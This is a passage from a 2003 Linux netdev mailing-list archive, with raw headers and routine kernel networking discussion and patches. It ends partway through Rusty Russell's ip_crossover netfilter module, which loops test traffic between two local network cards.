X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3878 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev This patch won't work for the non-module case (and it has a typo). From davem@redhat.com Wed Jul 9 17:28:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 17:28:42 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A0SY2x007907 for ; Wed, 9 Jul 2003 17:28:35 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id RAA24726; Wed, 9 Jul 2003 17:20:13 -0700 Date: Wed, 09 Jul 2003 17:20:12 -0700 (PDT) Message-Id: <20030709.172012.41656849.davem@redhat.com> To: ak@suse.de Cc: jgarzik@pobox.com, netdev@oss.sgi.com Subject: Re: reasons for dev_alloc_skb +16? From: "David S. Miller" In-Reply-To: <20030709175355.422545b5.ak@suse.de> References: <20030709152553.GB15293@gtf.org> <20030709175355.422545b5.ak@suse.de> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3879 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Andi Kleen Date: Wed, 9 Jul 2003 17:53:55 +0200 But it's not clear it is still a good idea because it leads to cache line misalignment of the beginning of the packet, forcing the card to do a costly Read-Modify-Write cycle. Only "dumb cards" do that, smart ones rewind to the beginning of the current cache line and ask for the whole thing instead of pieces. The +16 is actually needed to align the first hunk of the outgoing packet so we can do a 16-byte aligned memcpy of the hard-header cache as we build the packet. Jeff, look at LL_RESERVED_SPACE() and the comment above it in include/linux/netdevice.h From jmorris@intercode.com.au Wed Jul 9 18:31:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 18:31:37 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:+8CNk7KKoaKvqKiG9qA1ggxYqyLR+QVh@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A1VR2x010044 for ; Wed, 9 Jul 2003 18:31:28 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6A1Utr28674; Thu, 10 Jul 2003 11:30:56 +1000 Date: Thu, 10 Jul 2003 11:30:55 +1000 (EST) From: James Morris To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: davem@redhat.com, , , Subject: Re: Bug in Linux 2.5.74 IPv6 routing In-Reply-To: <20030710.034425.55677522.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3880 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Thu, 10 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > Please apply this patch. > > D: Fix ipv6_addr_prefix() for prefixlen != 0 (mod 8). > D: Patch from Jean-Luc RICHIER . Applied to bk://kernel.bkbits.net/jmorris/net-2.5 -- James Morris From davem@redhat.com Wed Jul 9 19:17:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 19:17:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A2H92x010807 for ; Wed, 9 Jul 2003 19:17:09 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id TAA25043; Wed, 9 Jul 2003 19:08:39 -0700 Date: Wed, 09 Jul 2003 19:08:38 -0700 (PDT) Message-Id: <20030709.190838.70200577.davem@redhat.com> To: shemminger@osdl.org Cc: netdev@oss.sgi.com Subject: Re: [PATCH] PPP handling fragmented skbuff's From: "David S. Miller" In-Reply-To: <20030627163524.347b2c8e.shemminger@osdl.org> References: <20030627163524.347b2c8e.shemminger@osdl.org> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3881 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Stephen Hemminger Date: Fri, 27 Jun 2003 16:35:24 -0700 Don't think this ever happens today, but if PPP ever gets a fragmented a skbuff and decides to copy it then bad things will happen. The following replaces the places that memcpy() with skb_copy_bits(). Applied, thanks Stephen. From davem@redhat.com Wed Jul 9 20:49:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 20:49:20 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A3nD2x011952 for ; Wed, 9 Jul 2003 20:49:14 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id UAA25268; Wed, 9 Jul 2003 20:39:48 -0700 Date: Wed, 09 Jul 2003 20:39:47 -0700 (PDT) Message-Id: <20030709.203947.116374520.davem@redhat.com> To: vnuorval@tcs.hut.fi Cc: yoshfuji@linux-ipv6.org, shemminger@osdl.org, netdev@oss.sgi.com Subject: Re: [PATCH] Tunnel device init patch From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3882 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Ville Nuorvala Date: Fri, 4 Jul 2003 16:00:29 +0300 (EEST) I noticed a couple of bugs(?) in sit.c, ip_gre.c and ipip.c introduced in the alloc_netdev patches (csets 1.305.3.9, 1.305.3.10 and 1.1305.3.11). This patch made against cset 1.384 fixes the following issues: Surely you mean changeset "1.1384" and also changesets "1.1305.3.9, 1.1305..." etc. above too :-) - tunnel dev pointer also set for fallback tunnels - dev name copied back to tunnel parameters so names autogenerated by kernel get correctly reported to userspace Applied, thank you. From davem@redhat.com Wed Jul 9 20:52:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 20:52:48 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A3qg2x012277 for ; Wed, 9 Jul 2003 20:52:43 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id UAA25287; Wed, 9 Jul 2003 20:43:12 -0700 Date: Wed, 09 Jul 2003 20:43:12 -0700 (PDT) Message-Id: <20030709.204312.68059397.davem@redhat.com> To: vnuorval@tcs.hut.fi Cc: yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: Fix incorrect dst_entry handling in ip6_tunnel.c From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3883 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Ville Nuorvala Date: Fri, 4 Jul 2003 16:14:18 +0300 (EEST) I noticed a bug in ip6ip6_err(), please apply this patch! Applied, thank you. From jmorris@intercode.com.au Wed Jul 9 21:43:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 21:43:15 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:8qQPMDpdNe7/V2wjfjX63I7fub7VUE57@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A4h12x012989 for ; Wed, 9 Jul 2003 21:43:03 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6A4gjr29383; Thu, 10 Jul 2003 14:42:48 +1000 Date: Thu, 10 Jul 2003 14:42:44 +1000 (EST) From: James Morris To: Jim Keniston cc: LKML , , Andrew Morton , "David S. Miller" , Jeff Garzik , Alan Cox , Randy Dunlap Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting In-Reply-To: <3F0AFFE6.E85FF283@us.ibm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3884 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Tue, 8 Jul 2003, Jim Keniston wrote: + kerror_nl = netlink_kernel_create(NETLINK_KERROR, kerror_netlink_rcv); + if (kerror_nl == NULL) + panic("kerror_init: cannot initialize kerror_nl\n"); You can simply use NULL instead of passing the dummy kerror_netlink_rcv function. +struct kern_log_entry { + __u16 log_kmagic; /* always LOGREC_KMAGIC */ + __u16 log_kversion; /* which version of this struct? */ + char log_facility[FACILITY_MAXLEN]; /* e.g., driver name */ These fields should generally be specified in ascending order to help with alignment. It may also be worth looking at how the ULOG code batches messages to improve peformance. - James -- James Morris From davem@redhat.com Wed Jul 9 22:56:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 22:56:33 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A5uP2x013654 for ; Wed, 9 Jul 2003 22:56:26 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id WAA25513; Wed, 9 Jul 2003 22:47:00 -0700 Date: Wed, 09 Jul 2003 22:47:00 -0700 (PDT) Message-Id: <20030709.224700.27801124.davem@redhat.com> To: vnuorval@tcs.hut.fi Cc: yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: ipv6-in-ipv6 tunnel using alloc_netdev From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3885 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Ville Nuorvala Date: Fri, 4 Jul 2003 23:23:44 +0300 (EEST) I finally had the time to fix ip6_tunnel.c so it also uses alloc_netdev() for creating new tunnel devices. Tested by adding and deleting tunnel device. Patch as attachment... Applied, thanks. From davem@redhat.com Wed Jul 9 23:01:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 23:01:09 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A6142x014023 for ; Wed, 9 Jul 2003 23:01:05 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id WAA25551; Wed, 9 Jul 2003 22:52:41 -0700 Date: Wed, 09 Jul 2003 22:52:41 -0700 (PDT) Message-Id: <20030709.225241.98880784.davem@redhat.com> To: tgraf@suug.ch Cc: netdev@oss.sgi.com Subject: Re: [PATCH] make {send|recv}msg return code 1003.1 compatible From: "David S. Miller" In-Reply-To: <20030709193628.GR2702@rei.rakuen> References: <20030709193628.GR2702@rei.rakuen> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3886 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Thomas Graf Date: Wed, 9 Jul 2003 21:36:28 +0200 1003.1 says: [EMSGSIZE] The msg_iovlen member of the msghdr structure pointed to by message is less than or equal to 0, or is greater than {IOV_MAX}. The patch changes the return code of {send|recv}msg from EINVAL to EMSGSIZE. Patch applied, thanks. From scott.feldman@intel.com Thu Jul 10 00:47:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 00:47:29 -0700 (PDT) Received: from hermes.jf.intel.com (fmr05.intel.com [134.134.136.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A7lK2x015324 for ; Thu, 10 Jul 2003 00:47:21 -0700 Received: from petasus.jf.intel.com (petasus.jf.intel.com [10.7.209.6]) by hermes.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6A7jAp10742 for ; Thu, 10 Jul 2003 07:45:10 GMT Received: from orsmsxvs040.jf.intel.com (orsmsxvs040.jf.intel.com [192.168.65.206]) by petasus.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6A7gTS03362 for ; Thu, 10 Jul 2003 07:42:29 GMT Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs040.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071000583616414 ; Thu, 10 Jul 2003 00:58:36 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Thu, 10 Jul 2003 00:47:14 -0700 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: [PATCH] netdev_ops Date: Thu, 10 Jul 2003 00:47:13 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [PATCH] netdev_ops Thread-Index: AcNGNWOcsUvuyZ5UQHGlJaWR4BWYQwAgbxyg From: "Feldman, Scott" To: "Matthew Wilcox" Cc: X-OriginalArrivalTime: 10 Jul 2003 07:47:14.0449 (UTC) FILETIME=[7A7D3010:01C346B7] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6A7lK2x015324 X-archive-position: 3887 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev Can we get a HAVE_NETDEV_OPS? From davem@redhat.com Thu Jul 10 00:50:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 00:50:38 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A7oV2x015601 for ; Thu, 10 Jul 2003 00:50:32 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id AAA25812; Thu, 10 Jul 2003 00:42:08 -0700 Date: Thu, 10 Jul 2003 00:42:07 -0700 (PDT) Message-Id: <20030710.004207.35528695.davem@redhat.com> To: scott.feldman@intel.com Cc: willy@debian.org, netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3888 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: "Feldman, Scott" Date: Thu, 10 Jul 2003 00:47:13 -0700 Can we get a HAVE_NETDEV_OPS? Don't tell me you're seriously considering having _TWO_ copies of all this code sitting around? At that point backwards compat becomes absolutely rediculious. If it's important to you, just stick to the current scheme. You gain nothing by maintaining two copies of the same code. From scott.feldman@intel.com Thu Jul 10 01:18:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 01:19:06 -0700 (PDT) Received: from hermes.jf.intel.com (fmr05.intel.com [134.134.136.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A8Iw2x016629 for ; Thu, 10 Jul 2003 01:18:58 -0700 Received: from petasus.jf.intel.com (petasus.jf.intel.com [10.7.209.6]) by hermes.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6A8Gmp26269 for ; Thu, 10 Jul 2003 08:16:48 GMT Received: from orsmsxvs040.jf.intel.com (orsmsxvs040.jf.intel.com [192.168.65.206]) by petasus.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6A8E7m22456 for ; Thu, 10 Jul 2003 08:14:07 GMT Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs040.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071001301421284 ; Thu, 10 Jul 2003 01:30:14 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Thu, 10 Jul 2003 01:18:51 -0700 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: [PATCH] netdev_ops Date: Thu, 10 Jul 2003 01:18:50 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [PATCH] netdev_ops Thread-Index: AcNGt+/LXquM9ebEQEO0AjBtV3zQ1gAAU8Vg From: "Feldman, Scott" To: "David S. Miller" Cc: , X-OriginalArrivalTime: 10 Jul 2003 08:18:51.0133 (UTC) FILETIME=[E50032D0:01C346BB] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6A8Iw2x016629 X-archive-position: 3889 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev > Don't tell me you're seriously considering having _TWO_ > copies of all this code sitting around? > > At that point backwards compat becomes absolutely > rediculious. If it's important to you, just stick to the > current scheme. You gain nothing by maintaining two copies > of the same code. Either way we end up with duplicated code. If I stick with the current scheme (no netdev_ops), I duplicate in the driver all of the wrapper code that Matt has pulled into netdev_ops. Each driver that sticks to the current scheme duplicates Matt's code. With HAVE_NETDEV_OPS, you're right, we're maintaining the wrapper code outside the kernel. But, it does leave the possibility of having a shared backwards compatibility code for multiple (all?) drivers for those stuck with supporting kernels without netdev_ops. From rusty@samba.org Thu Jul 10 01:48:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 01:48:29 -0700 (PDT) Received: from lists.samba.org (dp.samba.org [66.70.73.150]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A8mL2x017236 for ; Thu, 10 Jul 2003 01:48:21 -0700 Received: by lists.samba.org (Postfix, from userid 590) id 909D12C0DA; Thu, 10 Jul 2003 08:48:20 +0000 (GMT) From: Rusty Russell To: netdev@oss.sgi.com Cc: netfilter-devel@lists.netfilter.org, anton@samba.org Subject: [PATCH] Netfilter crossover module. Date: Thu, 10 Jul 2003 18:47:05 +1000 Message-Id: <20030710084820.909D12C0DA@lists.samba.org> X-archive-position: 3890 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rusty@rustcorp.com.au Precedence: bulk X-list: netdev Lots of people keep asking to be able to plug a crossover cables between to NICs in a machine, and use it for testing. This is a simple module which does this, by creating phantom machine(s) on each network with IP address 1 greater than the interface. Testers welcome. Ignore the backwards compat crap, it'll be out of the final version. Example usage: # Bring interfaces up ifconfig eth0 192.168.1.1 ifconfig eth1 192.168.2.1 # Add module which creates "phantom" machines 192.168.1.2, and 192.168.2.2. modprobe ip_crossover dev1=eth0 dev2=eth1 # Tell kernel that 192.168.1.2 packets go to eth1, and .2.1 to eth0. arp -s 192.168.1.2 arp -s 192.168.2.2 It'd be nice to have the module hardwire the arps itself, but this was quickest. Patch welcome. Rusty. Name: Hardware Loopback Module Author: Rusty Russell Status: Tested on 2.5.74-bk5 D: For testing it is often nice to connect two NICs with a crossover D: cable and have the machine route packets between them. D: D: Since Linux steadfastly regards IP addresses as properties of the D: box, not the individual NICs, this requires some trickery. A simple D: netfilter module makes this possible, by producing "phantom" boxes. diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/Kconfig working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Kconfig --- linux-2.5.74-bk5/net/ipv4/netfilter/Kconfig 2003-07-03 09:44:02.000000000 +1000 +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Kconfig 2003-07-08 18:03:29.000000000 +1000 @@ -587,5 +587,18 @@ config IP_NF_COMPAT_IPFWADM If you want to compile it as a module, say M here and read . If unsure, say `N'. +config IP_NF_CROSSOVER + tristate "IP forced crossover support (EXPERIMENTAL)" + depends on EXPERIMENTAL + help + This option allows you to connect two local network cards + with a crossover cable, and then force packets to pass over + that cable (Linux will normally short-circuit such packets). + + If you want to compile it as a module, say M here and read + : the module will be called + ip_crossover. + + Say `N'. endmenu diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/Makefile working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Makefile --- linux-2.5.74-bk5/net/ipv4/netfilter/Makefile 2003-07-03 09:44:02.000000000 +1000 +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Makefile 2003-07-08 18:03:29.000000000 +1000 @@ -92,3 +92,5 @@ obj-$(CONFIG_IP_NF_COMPAT_IPCHAINS) += i obj-$(CONFIG_IP_NF_COMPAT_IPFWADM) += ipfwadm.o obj-$(CONFIG_IP_NF_QUEUE) += ip_queue.o + +obj-$(CONFIG_IP_NF_CROSSOVER) += ip_crossover.o diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/ip_crossover.c working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/ip_crossover.c --- linux-2.5.74-bk5/net/ipv4/netfilter/ip_crossover.c 1970-01-01 10:00:00.000000000 +1000 +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/ip_crossover.c 2003-07-10 18:04:59.000000000 +1000 @@ -0,0 +1,257 @@ +/* Copyright 2003 Rusty Russell, IBM Corporation. + * + * Simple packet mangling. The idea is to use a crossover between two + * local NICs for testing, then this module creates "phantom" boxes on + * each network at the interface address + 1. + * + * Packets sent to one phantom will come in like they came from the other. + * + * Usage: + * ifconfig eth0 192.168.1.1 + * ifconfig eth1 192.168.2.1 + * arp -s 192.168.1.2 + * arp -s 192.168.2.2 + * modprobe ip_crossover dev1=eth0 dev2=eth1 + * + * Then doing ping 192.168.1.2, ICMP ping goes out eth0 and comes + * back in eth1. Reply goes out eth1 and comes back in eth0. */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +struct ifinfo +{ + /* Keep track of name so we can drop reference. */ + char name[IFNAMSIZ]; + + /* Cached interface addr. */ + u32 ifaddr; + + /* "Phantom" box which gets mapped. */ + u32 phantom; +}; + +static struct ifinfo devinfo1, devinfo2; + +/* Stolen from Alexey's ip_nat_dumb. */ +static int nat_header(struct sk_buff *skb, u32 saddr, u32 daddr) +{ + struct iphdr *iph = skb->nh.iph; + + u32 odaddr = iph->daddr; + u32 osaddr = iph->saddr; + u16 check; + + /* Rewrite IP header */ + iph->saddr = saddr; + iph->daddr = daddr; + iph->check = 0; + iph->check = ip_fast_csum((unsigned char *)iph, iph->ihl); + + /* If it is the first fragment, rewrite protocol headers */ + if (!(iph->frag_off & htons(IP_OFFSET))) { + u16 *cksum; + + switch(iph->protocol) { + case IPPROTO_TCP: + cksum = (u16*)&((struct tcphdr*) + (((char*)iph)+(iph->ihl<<2)))->check; + if ((u8*)(cksum+1) > skb->tail) + return 0; + check = *cksum; + if (skb->ip_summed != CHECKSUM_HW) + check = ~check; + check = csum_tcpudp_magic(iph->saddr, iph->daddr, + 0, 0, check); + check = csum_tcpudp_magic(~osaddr, ~odaddr, 0, 0, + ~check); + if (skb->ip_summed == CHECKSUM_HW) + check = ~check; + *cksum = check; + break; + case IPPROTO_UDP: + cksum = (u16*)&((struct udphdr*) + (((char*)iph)+(iph->ihl<<2)))->check; + if ((u8*)(cksum+1) > skb->tail) + return 0; + if ((check = *cksum) != 0) { + check = csum_tcpudp_magic(iph->saddr, + iph->daddr, 0, 0, + ~check); + check = csum_tcpudp_magic(~osaddr, ~odaddr, + 0, 0, ~check); + *cksum = check ? : 0xFFFF; + } + break; + case IPPROTO_ICMP: + { + struct icmphdr *icmph + = (struct icmphdr*)((char*)iph+(iph->ihl<<2)); + struct iphdr *ciph; + u32 idaddr, isaddr; + + if ((icmph->type != ICMP_DEST_UNREACH) && + (icmph->type != ICMP_TIME_EXCEEDED) && + (icmph->type != ICMP_PARAMETERPROB)) + break; + + ciph = (struct iphdr *) (icmph + 1); + + if ((u8*)(ciph+1) > skb->tail) + return 0; + + isaddr = ciph->saddr; + idaddr = ciph->daddr; + + /* Change addresses inside ICMP packet. */ + ciph->daddr = iph->saddr; + ciph->saddr = iph->daddr; + cksum = &icmph->checksum; + /* Using tcpudp primitive. Why not? */ + check = csum_tcpudp_magic(ciph->saddr, ciph->daddr, + 0, 0, ~(*cksum)); + *cksum = csum_tcpudp_magic(~isaddr, ~idaddr, 0, 0, + ~check); + break; + } + default: + break; + } + } + return 1; +} + +static unsigned int xover_hook(unsigned int hook, + struct sk_buff **pskb, + const struct net_device *in, + const struct net_device *out, + int (*okfn)(struct sk_buff *)) +{ + /* Going out to phantom box 1: change it to coming from + phantom box 2, and vice versa. */ + if ((*pskb)->nh.iph->daddr == devinfo1.phantom) { + printk(KERN_DEBUG "dev1: %u.%u.%u.%u->%u.%u.%u.%u" + " becomes %u.%u.%u.%u->%u.%u.%u.%u\n", + NIPQUAD((*pskb)->nh.iph->saddr), + NIPQUAD((*pskb)->nh.iph->daddr), + NIPQUAD(devinfo2.phantom), + NIPQUAD(devinfo2.ifaddr)); + if (!nat_header(*pskb, devinfo2.phantom, devinfo2.ifaddr)) + return NF_DROP; + } else if ((*pskb)->nh.iph->daddr == devinfo2.phantom) { + printk(KERN_DEBUG "dev1: %u.%u.%u.%u->%u.%u.%u.%u" + " becomes %u.%u.%u.%u->%u.%u.%u.%u\n", + NIPQUAD((*pskb)->nh.iph->saddr), + NIPQUAD((*pskb)->nh.iph->daddr), + NIPQUAD(devinfo1.phantom), + NIPQUAD(devinfo1.ifaddr)); + if (!nat_header(*pskb, devinfo1.phantom, devinfo1.ifaddr)) + return NF_DROP; + } + + return NF_ACCEPT; +} + +static struct nf_hook_ops xover_ops += { .hook = xover_hook, + .owner = THIS_MODULE, + .pf = PF_INET, + .hooknum = NF_IP_POST_ROUTING, + .priority = NF_IP_PRI_MANGLE, +}; + +static int __set_dev(const char *name, struct ifinfo *ifi) +{ + struct net_device *dev; + struct in_device *indev; + + dev = dev_get_by_name(name); + if (!dev) + goto fail; + indev = __in_dev_get(dev); + if (!indev || !indev->ifa_list) + goto put_fail; + + ifi->ifaddr = indev->ifa_list->ifa_address; + ifi->phantom = htonl(ntohl(indev->ifa_list->ifa_address) + 1); + if (ifi->phantom == indev->ifa_list->ifa_broadcast) + goto put_fail; + + strlcpy(ifi->name, name, sizeof(ifi->name)); + printk(KERN_INFO 